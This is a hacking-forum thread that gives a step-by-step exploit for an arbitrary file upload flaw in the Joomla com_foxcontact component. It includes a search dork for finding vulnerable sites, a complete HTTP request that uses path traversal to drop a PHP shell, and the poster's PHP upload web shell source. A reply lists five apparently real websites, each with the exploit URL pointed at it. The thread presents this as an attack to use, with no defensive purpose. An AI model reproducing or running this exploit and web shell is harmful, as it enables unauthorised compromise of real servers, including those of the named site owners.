Exploit com_foxcontact upload shell (2 Viewers)

Joined
Jan 19, 2017
Credits
0
Rating - 0%
Manual Exploit com_foxcontact shell upload
We will use any header injection tool
I will use a burp suite
dork inurl:com_foxcontact

-HTTP Header Example-
View hidden content is available for registered users!

POST http://127.0.0.1/components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../up.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: shell.php
Content-Type: image/jpeg
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

<?php cmd or file upload ?>

############################

Shell path:
View hidden content is available for registered users!

www.site.com/components/com_foxcontact/filename.php

###########################
my script upload :) :)
View hidden content is available for registered users!

<?php
echo "<center>";
$files = @$_FILES["files"];

if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "<h1><a href='$fullpath'>upload successful ^__^</a></h1>";
}
}echo '
<img src="http://www.sqorebda3.com/vb/Photo/new_1422333365_894.gif"> <br><br><br><br>
<html><head><title>file upload by sohaip-hackerDZ</title></head><body>
<style type="text/css">
body{
background-color: #000000;
font: bold;
font-size: 20px;
}
b{
color:#FF0000;
font-size: 20px;
}
</style>
<b>file upload by sohaip-hackerDZ<b><br><br>

<form method=POST enctype="multipart/form-data" action=""><input type="file" name="files"><input type=submit value="Upl0Ad"></form></body></html>';
echo "<center/>";
?>

video
View hidden content is available for registered users!
 
Joined
Dec 19, 2016
Credits
9
Rating - 0%
WHY?
error: File is too large.

vickiturnbullschoolphotography.co.nz/components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../b.php
vectracommunications.com/components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../b.php
tristarcasino.com/components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../b.php
arizonabankruptcycenter.com/components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../b.php
nextlevelsounds.com/components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../b.php
 

Users who are viewing this thread

Top